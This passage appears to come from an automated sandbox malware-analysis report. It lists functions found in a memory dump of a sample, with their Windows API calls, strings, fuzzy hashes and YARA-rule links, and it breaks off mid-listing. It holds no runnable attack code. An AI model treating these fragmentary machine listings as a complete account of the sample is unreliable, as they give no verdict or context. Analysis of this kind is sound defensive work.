CoCreateInstance.OLE32(0073FCF8,00000000,00000001,0073FB68,?), ref: 007159AE
CoUninitialize.OLE32 ref: 007159CC

Strings

.lnk, xrefs: 00715876, 007158C1, 00715985

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 8f8e6ddf9889d78515379b070bc369a78d2c9b481c6870302f632d54227c8f23
Instruction ID: 137735d03595a2aa69c6ee58a0cc5311992da1911c35e416161e86b15c9d16c1
Opcode Fuzzy Hash: 8f8e6ddf9889d78515379b070bc369a78d2c9b481c6870302f632d54227c8f23
Instruction Fuzzy Hash: 1DD147B1608601DFC718EF18C48096ABBE6EF89710F14895DF8859B3A1DB35ED85CF92

Function 0070175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00700FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00700FCA
Part of subcall function 00700FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00700FD6
Part of subcall function 00700FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00700FE5
Part of subcall function 00700FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00700FEC
Part of subcall function 00700FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00701002

GetLengthSid.ADVAPI32(?,00000000,00701335), ref: 007017AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007017BA
HeapAlloc.KERNEL32(00000000), ref: 007017C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 007017DA
GetProcessHeap.KERNEL32(00000000,00000000,00701335), ref: 007017EE
HeapFree.KERNEL32(00000000), ref: 007017F5

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 1d63d78fc175b11c6b8fe4461b7278477d8ad7056a4aab54db4a0387bb6e1bef
Instruction ID: 971a0dec10232068bce6180b2b804788b6a84a1d694141d6bbf6459ad85e56b3
Opcode Fuzzy Hash: 1d63d78fc175b11c6b8fe4461b7278477d8ad7056a4aab54db4a0387bb6e1bef
Instruction Fuzzy Hash: 5E11BE72500205FFEB159FA4CC49BAE7BE9EB4535AF508218F481A7290D739AD40DB60

Function 007014CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007014FF
OpenProcessToken.ADVAPI32(00000000), ref: 00701506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00701515
CloseHandle.KERNEL32(00000004), ref: 00701520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0070154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00701563

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 1bfd1e36344714ef932e03df61b9009ed08486b3737941eef13351d597ee8360
Instruction ID: 5c4cf0d04c80bf050b1f4fbad473209d1438bcc75595b2c338f85120a3955bf1
Opcode Fuzzy Hash: 1bfd1e36344714ef932e03df61b9009ed08486b3737941eef13351d597ee8360
Instruction Fuzzy Hash: 3B112972500249EBEF128F98DD49BDE7BE9EF48749F048115FA05A60A0C3798E64DB61

Function 006C3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006C3379,006C2FE5), ref: 006C3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006C339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006C33B7
SetLastError.KERNEL32(00000000,?,006C3379,006C2FE5), ref: 006C3409

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 271492c2687cdbbdd336e866f063de9ea849ecb16559708e2657eacba564af00
Instruction ID: cedeb6ead6cdb93bdd004c12a2bb310a1f48866f2bbf56e5ca7f27d100dcfe4d
Opcode Fuzzy Hash: 271492c2687cdbbdd336e866f063de9ea849ecb16559708e2657eacba564af00
Instruction Fuzzy Hash: 9901243260C3B1BEA62637757C95FB63A96EB15379320C22EF410853F0EF594D02528C

Function 006D2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006D5686,006E3CD6,?,00000000,?,006D5B6A,?,?,?,?,?,006CE6D1,?,00768A48), ref: 006D2D78
_free.LIBCMT ref: 006D2DAB
_free.LIBCMT ref: 006D2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,006CE6D1,?,00768A48,00000010,006A4F4A,?,?,00000000,006E3CD6), ref: 006D2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,006CE6D1,?,00768A48,00000010,006A4F4A,?,?,00000000,006E3CD6), ref: 006D2DEC
_abort.LIBCMT ref: 006D2DF2

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 3bf6e78e53b563725c0f157a3c8872c01105c99128eccd7ba07c57f944e4eb85
Instruction ID: 1086f68610c5bd92a682aae8568380d216bd3ba3e048641623151f6417a4a219
Opcode Fuzzy Hash: 3bf6e78e53b563725c0f157a3c8872c01105c99128eccd7ba07c57f944e4eb85
Instruction Fuzzy Hash: 22F0CD31D0470267D75327357C36E5B25576FE27A1F24441FF464D23D1EE6889015279

Function 00738A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 006B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006B9693
Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96A2
Part of subcall function 006B9639: BeginPath.GDI32(?), ref: 006B96B9
Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00738A4E
LineTo.GDI32(?,00000003,00000000), ref: 00738A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00738A70
LineTo.GDI32(?,00000000,00000003), ref: 00738A80
EndPath.GDI32(?), ref: 00738A90
StrokePath.GDI32(?), ref: 00738AA0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: fe290c9225c49ff4359e1db984cb138fbd965e2fc8777ea70c3699da98ab0992
Instruction ID: cb1176cde34a79fcd0a1068211ef3425a3a01acc985bbe6c91467b8d28d1f69f
Opcode Fuzzy Hash: fe290c9225c49ff4359e1db984cb138fbd965e2fc8777ea70c3699da98ab0992
Instruction Fuzzy Hash: 84111E7600014CFFEF129F94DC48E9A7F6DEB04355F00C011BA1999161D7759D55DFA4

Function 007051FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00705218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00705229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00705230
ReleaseDC.USER32(00000000,00000000), ref: 00705238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0070524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00705261

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7e9e3cd9a7ebcaefff9c000fb953752ee2ed42847b4c60538daacf82c6d183ca
Instruction ID: 616c60f966884322883999c29921d8d4b13b5842f52098750b88145db076ad65
Opcode Fuzzy Hash: 7e9e3cd9a7ebcaefff9c000fb953752ee2ed42847b4c60538daacf82c6d183ca
Instruction Fuzzy Hash: 67018FB6A00708FBEB119BA59C49A5EBFB8FF48352F048165FA04E7290D6749800CFA4

Function 006A1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 006A1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 006A1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 006A1C22

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b4cf20d3c230584b5bdb48f9b4b493fb2fb8bf97a0ad660fc21089dbb185c252
Instruction ID: 04de628feb0283686404b8a88eed28aa8b916247e850199edeb1131fcfbdc96b
Opcode Fuzzy Hash: b4cf20d3c230584b5bdb48f9b4b493fb2fb8bf97a0ad660fc21089dbb185c252
Instruction Fuzzy Hash: 560167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00415BA15C4BA42C7F5A864CBE5

Function 0070EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0070EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0070EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0070EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0070EB75

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: effa0d585b5815832055f9afcdf422981422446544216da7a1a67a6c0c1f1d18
Instruction ID: 8bf786e4fbad38eb85d5c1aaae50f4a9e83c12f821092a296635f05e7ce339bd
Opcode Fuzzy Hash: effa0d585b5815832055f9afcdf422981422446544216da7a1a67a6c0c1f1d18
Instruction Fuzzy Hash: DFF030B2140158BBF72257629C0EEEF3A7CEFCAB12F008158F601E1091D7A85A01D7B9

Function 006F7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 006F7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 006F7469
GetWindowDC.USER32(?), ref: 006F7475
GetPixel.GDI32(00000000,?,?), ref: 006F7484
ReleaseDC.USER32(?,00000000), ref: 006F7496
GetSysColor.USER32(00000005), ref: 006F74B0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: fbd3ee1c6bcd245d27c4ac3aced401a7c619709c8e667ae21a301206793a46a3
Instruction ID: 70c012f3eb9feda3f0e2cf836e6b2e6fd986735cf87b622e8744347676ddf0ae
Opcode Fuzzy Hash: fbd3ee1c6bcd245d27c4ac3aced401a7c619709c8e667ae21a301206793a46a3
Instruction Fuzzy Hash: C901AD31400219EFEB125F64DC09BFE7BB6FF04312F608060FA15A61A0CB352E51EB14

Function 00701874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0070187F
UnloadUserProfile.USERENV(?,?), ref: 0070188B
CloseHandle.KERNEL32(?), ref: 00701894
CloseHandle.KERNEL32(?), ref: 0070189C
GetProcessHeap.KERNEL32(00000000,?), ref: 007018A5
HeapFree.KERNEL32(00000000), ref: 007018AC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 68cd532bb3385a4dd59abae5c4dc6c46e26f92878b89382704a653cc35a81e49
Instruction ID: d3c80adce5e16e9a0322bcfa890d01e0cf7eeb0a00465979aa4b5a77e75e1a66
Opcode Fuzzy Hash: 68cd532bb3385a4dd59abae5c4dc6c46e26f92878b89382704a653cc35a81e49
Instruction Fuzzy Hash: 44E0E576004105BBEB025FA1ED0C90ABF39FF49B23B10C220F225A1070CB369830EF58

Function 006ABBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006ABEB3

Strings

D%w, xrefs: 006ABE9A
D%w, xrefs: 006ABDED, 006ABD91, 006ABD1B
D%wD%w, xrefs: 006ABCA5
D%w, xrefs: 006ABCA2

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%w$D%w$D%w$D%wD%w
API String ID: 1385522511-1150760593
Opcode ID: fc44e074d6858d79c34d03ccb6baf13b49c34a136595c367d8326fd03e8955f2
Instruction ID: 171eaaf57f1521ced85febd8390166c38c22deed87f8689b8383841631dd57de
Opcode Fuzzy Hash: fc44e074d6858d79c34d03ccb6baf13b49c34a136595c367d8326fd03e8955f2
Instruction Fuzzy Hash: 63914C75A00206DFCB14EF58C090AA9B7F2FF5A310B24916DD556AB352D731AD82CF90

Function 00727B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 006C0242: EnterCriticalSection.KERNEL32(0077070C,00771884,?,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C024D
Part of subcall function 006C0242: LeaveCriticalSection.KERNEL32(0077070C,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C028A

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 006C00A3: __onexit.LIBCMT ref: 006C00A9

__Init_thread_footer.LIBCMT ref: 00727BFB

Part of subcall function 006C01F8: EnterCriticalSection.KERNEL32(0077070C,?,?,006B8747,00772514), ref: 006C0202
Part of subcall function 006C01F8: LeaveCriticalSection.KERNEL32(0077070C,?,006B8747,00772514), ref: 006C0235

Strings

G, xrefs: 00727C7F
5, xrefs: 00727C78
+To, xrefs: 00727E2E
Variable must be of type 'Object'., xrefs: 00727C3A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +To$5$G$Variable must be of type 'Object'.
API String ID: 535116098-412540982
Opcode ID: d28b302ec3ead7467299c29a48a40ec4d3999f172f15415ca0998a80f920fdb4
Instruction ID: 40178c9c726e4c8ca4eb994ed0fb51c0f9fa0b2c7f3ec668a1757a06926a7026
Opcode Fuzzy Hash: d28b302ec3ead7467299c29a48a40ec4d3999f172f15415ca0998a80f920fdb4
Instruction Fuzzy Hash: 17917F70A04219EFCB18EF54E9959BDB7B6FF45300F14805DF8066B292DB39AE81CB61

Function 0070C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0070C6EE
_wcslen.LIBCMT ref: 0070C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0070C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0070C7CA

Strings

0, xrefs: 0070C6AF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 08bd2e7b7ffb2824a399eeef6763aeff34d490aa830c458fd21ecca64f38712e
Instruction ID: 7820d6a2e646ea6415991fb145ae7a66d5132c83163091dc3ff187af5ab368e8
Opcode Fuzzy Hash: 08bd2e7b7ffb2824a399eeef6763aeff34d490aa830c458fd21ecca64f38712e
Instruction Fuzzy Hash: ED51BC71604300DBD766EF28C885BAAB7E8AF89310F045B2DF995E21E0DB78DD448F56

Function 0072AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0072AEA3

Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625

GetProcessId.KERNEL32(00000000), ref: 0072AF38
CloseHandle.KERNEL32(00000000), ref: 0072AF67

Strings

@, xrefs: 0072AE72
<, xrefs: 0072AE6B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 00081cd583e1022304b28013e75c5420adb977649dd6fb9e01b27092b8f1039d
Instruction ID: 60536b7bf995817a494bf74f97e4aa66fab80b24dd19fc2978218c25dd630080
Opcode Fuzzy Hash: 00081cd583e1022304b28013e75c5420adb977649dd6fb9e01b27092b8f1039d
Instruction Fuzzy Hash: B5716771A00625EFCB14EF54D485A9EBBF1AF09310F04849DE816AB362CB78ED45CFA5

Function 0070719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00707206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0070723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0070724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007072CF

Strings

DllGetClassObject, xrefs: 00707242

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: abb4d3fb64aeade084168428896fa67e847c3f42cb42d411426c61d702c84819
Instruction ID: fba563419474f10ae057220c04f6edb552a2372aafa8174d1ea3a99032f48fe7
Opcode Fuzzy Hash: abb4d3fb64aeade084168428896fa67e847c3f42cb42d411426c61d702c84819
Instruction Fuzzy Hash: 864151B1A04204EFDB19CF54C884A9A7BF9FF44310F1581A9BD059F24AD7B9ED44DBA0

Function 00732F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

